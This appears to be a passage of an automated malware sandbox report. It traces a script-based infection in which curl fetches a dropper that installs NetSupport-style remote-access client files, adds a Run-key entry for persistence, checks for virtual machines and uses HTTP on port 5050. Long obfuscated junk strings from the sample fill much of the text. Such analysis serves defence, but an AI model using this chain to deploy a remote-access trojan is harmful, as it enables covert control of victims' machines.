                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996039604.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000014.00000002.514239089.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000015.00000002.531133820.000000006FA21000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.994296393.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000012.00000000.509036667.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000000.511172990.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000002.512939596.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000000.529209047.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000002.530355277.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996230753.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000014.00000002.514500269.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000015.00000002.531560784.0000000073B72000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.996179417.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000014.00000002.514448933.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000015.00000002.531514619.000000006FBD5000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.15.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr

                                Data Obfuscation

                                barindex
                                JScript performs obfuscated calls to suspicious functions
                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject(asxc)}function anonymous() {/*bmGHnpjSkYQIlQlyHvcRXvRCsYRVBhoCHeNGbqWbwwWVkqIpNFmxjdbskNuCATeNpLxCJEaUCxQlrBHoXaHnxGJKlEaDXjqHgHwriBGOZlZrerUegflpMCOUmuGXdSsCtGJRYzMtMlUfZRsOBQsoJZhexgnQxIEUsiuZhZFzFcwHJYiLKIcjASjITVArKefAiElEKXustADnFbQAUvqVgtVnJMTEPvxZSsNAXigWzQVyiJqamrrfUOoTQcfigcqqjjVLmlhhgOpvKCEwsEjwfJGTUTskoYYirHQfTMoDokojDojSFsLXLBoPSoDQjEooXpeyqrtAKmTLSyiFBpsQRZfFZuwzWdhNUWkgpeEwVtbvvGRfvFQSwryNjhxDsomVMdgrlbiGIEWBFECXAUkGViVnMouuaTvOldNuiDZTNEjasifKkflOjLmDSVjqwwKQUxsayxDJMvfHyeJUDpeEtQAPBjHzEAIwsGYtmEkREtekuBJYKqUuDeMBrNmiaRUBkEbNOLlCXyKJHYHhcoDnbIjiTyZQxMzQnbgkJhMeAEVQbSLYihMTCHVANXRhIgoojEnuImPdAvVGDycFigceUADVxWyQfbsDaUUsDFoYMnIPDhFnAsBQkpnpQwcHmNsAKjMOpnVqaZcaJpJBrIPYWDRMpJtmPzBDDZmzYMJIPYhfcwFyifNnjoAveiYYoOKqhFIlFzByEIrJHjlDTRgHQywRfyfbtXjrucodiagTFdVtgJtRsxBxPRjEQAktQgJahpBcFyhQZYyBCQYnqRdWFomwoNLneYeGDIfrMRQbCfLBVpdHbQSgfuYItIHMAzkbeoqQfxGNVyyluCakuqACtErIFsSgvUtLRTFIadNxZqmFKQcRxDinyjrTtkltzmZyTgvAXeIseynXbNQfpUxFnhlTJmwPGfoQNsYKOlibQjjeEDxZmaSrUdJFEvExxHbGGlRluYyqEUmDqBDBIwxDvxAtvXdBIIpkyWmcSGbfWBpQstmcKMaeUVvBqDjdsxYwdhjanOsKSQARUrHElgFGPiwUzaApRvabxNqgMNEKjvVHrUHkFufoLQFZBpgmOXnyrHXXxAGNGAKWhkAxAOskMLmzZhgvvRKoljykHZOINNqjBHVmIgjPEdooNJgUSoKwUHhAgsRsgtFUMIzhoqmEiOHvMpgORvbWyLaUWlhjASireAYBHLWANGFzyvADSorljDLQqhaNfFeMImuYhkPGBtUlSlPgpnUeaqABGSYIBjRWORotpFDNwWdRBBEUeXpOUbsgGdPRWcdHjkSqtTkyEFeEwtCTxMnbtSUzBjikDKrCEnyfYwkyqukFrAqfrSPctIIbNMzLKEDMkbtpCJBTsenQIVWCnnRtkCjgUHqEuErttGVSpjHvFpVDOJdeyIuBEDQOruWwoGhDsCxRomKrqbKlzZXWZtacqwVNmIzzvoFvjAClKznDOuJsaDnXgQgOSbjDEPTAModTQqZNLczWzcUtPvltImPFvdEOEcImjPtuAzgOBiHTRGgBpyYdroNyWBXeRdEmuECEVCYqwIYBlVIBYzioINvBNevWcBliuRdjVMHyaZlLaHdBoFNjhgZqzqaRXStbCGQbFRacYqqZNZtiFpnRDVZcbumGuBToDTNEwMKTyxZkCANnbjXXqUcFSNHZOOgqZPILDbRqzcvkryrQsjgHYmsapqKlbBkBcBynyposURJceftpiDBTEsikINBcZRtdAWhfXsruNgoaRcBBpiMOADebUemXBTVuIUqqMFAhTZQvwvURJDbYPqHFJcYrPIiwwRjjEugFaBzkWggCgerVEmiXGUHpBEuBrQmyiEpcMOvzrJZYLtMdjKDkiDMwQqDeALFSJiAiMqeOBprOIsJXlsmBnGvaFsFWmBqThFXjdwKOmJdaeZEEJQwDndqOhggGxzyIIEhVZeuiIFaeJpYZcSqlrNgrvyFvtDHOAaCEaKwLWswBHwuGrYlHlbgdWrPaSONXtCBEQWTRTqVEjKzHgpVrvgkdtHtijZxpPYcStcIzBfUWrVpPCZVVlwtvqtviQpjLHvkfWGdUNzYPbOVWaduaCTLzwwafsvqUMNzbjbWuRaHEDfNZCSjGsUOvQtjKgFsARhfVYkNQdPzTknsfWnBhoSDDXPWwHQSvurYcCTkViDOaeDYFxJNqvDlbzvpkWpvanUjLSfcUdXKdKcAfaMpBmacnZaWCoyCgFFgLROqoYtcIcTmnvhmSrQxRqrOPEmpRLFYxJxrmdeNrYLfPiRadbXKoUQBlYFMSZCSDJCjEiLebslgwGyMXEOcxQWmwbvjDJZafWHFnJXwgyGtlXqWGeJwMpRDPFevGQCSuGZTwWpJByrZtivCVQqiBBmoVAOChmkrNGPTVfwZSsYMoOMPevTPhKDDbrjOrUlIbZzwTxCGKDlddaNyYBFYOaJZuqHxnJsbFmszICHBullxCTPEgRtkBhLENWnvEaaByJKQwISfguFkjjbhnFDfBmIwIoxHlMelBJHwizxAElmrfWEeuVTdOTntbEHDGewnDSQSZGycMRiRwfnCeaGlplaWRFwyllxMRoCPPjxtFaAyLKYmvwUScAqIzGmxipKoqTRngmeYdCTHZmSwXcVZdegbYaHdywnzMyWAMQbMPLVMkRUKvvtnZEzomTjmcIBcZcsJatsGVGIekLdbwTJHsLgkALeYwQJHvNMGnWnQdFDafbJDLGAfnEITfnndkGEMVFxmFGjNSYVfFZallYFgnjigsQnfXoDLssDJgwfAgwGfvJqrFugUPYkLhwGfwyBZZQZZIqSTpUHtjsvSYTBYmeXlPOcoIGUygCKsydbByjNzfdEvTAMDUKZkeWCUZCwLPeEvbtqCDwZBarawDvBDwCvpTDiMVQZaOJxeJJkEMClNmlusjYYofMChgdubRCaeDRltCtpNKqoNLgkotGdewS
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046CC80 push eax; ret 15_2_0046CCAE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459590 push ecx; mov dword ptr [esp], ecx15_2_00459591
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046B890 push eax; ret 15_2_0046B8AE
                                Source: 7zz.exe.6.drStatic PE information: section name: .sxdata
                                Source: putty.exe.15.drStatic PE information: section name: .00cfg
                                Source: putty.exe.15.drStatic PE information: section name: .gxfg
                                Source: putty.exe.15.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.15.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00471C24
                                Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Command shell drops VBS files
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b2.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b3.vbsJump to behavior
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedXJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedXJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 5050 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5050
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exe TID: 5248Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\timeout.exe TID: 3324Thread sleep count: 43 > 30Jump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040C5F4 GetSystemInfo,15_2_0040C5F4
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,15_2_0040B174
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,15_2_0040B6E9
                                Source: C:\ProgramData\client32.exeAPI call chain: ExitProcess graph end nodegraph_18-24
                                Source: HTCTL32.DLL.15.drBinary or memory string: VMware
                                Source: wscript.exe, 00000000.00000003.511001165.0000022C21740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSU.>
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkjhAWAzREGSIiaPKbJOWImdmEThhUqibHZRFTqqqxplJZJZWDZSxvYKjWRVNoosxOpshLZUddSjyTdOSXKVfKOAySOHjfzZzhFKXAcejtuRFkMwZYXYuggnomefyCxCRDLOlQwPxpbErNeyUIsdDhqWnedWSVZFXwHyoxqMrktquZDjVnAQdZioZxxqjupWNvOeRqTbDcywhtixpLeemSpiJWaiVcGwhlpluWxtdKzcgxFYNnVlTMkvqpAfMdppwKkmfvoecyzaGKRTAzaizDhwZnuILcJkfuNcwhfGufznrTnQyFJBjUndaRWEbhHsPwfKRorJSUKyLFfqtHQzXbeBQFfXVnyxTMDoaVvTfiKmjtsSYbAfTFsREmtmgdjvkRqQavDrGUcqVBWnnfnjjYztkgdmJGHVCiTgpmPWxSQXesVxtICEpFUuWDvHXUeRwynwkckqBvnPeEmwyEagIgDLmkbqKNHzEbrgMuadbwuolGhGMTOCcTCEVpPRjjlTRurwGUadEvwChbgBWHDoqNMFWSlUVqumvmSHcYMGcGyckQcMUjXJSzlmWBVOBWpwbXtfIFTBAqDLBZOVentIvIYWBSxMnytFlewxJkeoyjJmgrYHHooXLgqAOqyPwGvZZfmexekUKjBOKtvsdAYKICwdUttxFhRvULgnvpoOzBeHZKHDDcMZgxMWWHgpBBoliYTwvexzytpZWHYLrLqfaIMZPUBGwSMVkkYFidAsDcxrhkpdFhpqrqTnPZXoBBlAZBQQEyLXkqdKNMmHjxKuvfMlaETITiejydzhJhusVyhVzifpvrXQIpGJeeQrkIZqdSYVAsnQGlcGwVXIanWDlsGSwHKcCvdJdLlyKQcEgkkCdYImqkEkOCYFNbCJoqVsfsmOgudGpBrVJKCkQJaTIuvPWLaemQkBbnGMLBVCbXcfrmQzpaLCLcZhXDRqPgKhuTDubdDumTBykxzmGxlcmpCRZSXApROULGcseHnDIUVHTOTATEosyVHop
                                Source: TCCTL32.DLL.15.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: wscript.exe, 00000000.00000003.475681562.0000022C1F275000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510572886.0000022C1F275000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512087442.0000022C1F275000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.521524355.000000000648F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519208890.000000000648F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995332303.000000000648E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.15.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: wscript.exe, 00000000.00000003.511001165.0000022C21740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stUKaHUcluKWTqJJKgsLsGqgAYgSSJKnBCJQBizVnnivxFXDKfeFPzYqxUkocoOBnEjzpXWHtjzgyuqacuRdpCYPdABXMrKuZlDTtOzgEaKStPmkdvePmCAgQHIxbJhlponzVukWlMiTGpVoYuJYVZURtCjMFUMoZgOFtAfZlDRdRFvgeAGGrkJOwTEDUkOTmWtoOUDmpaaYAZTeQdkHSfPShZVNWkpTmIemzCFMakDtUbPAgTfbXyQZhURcBRfhmGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWp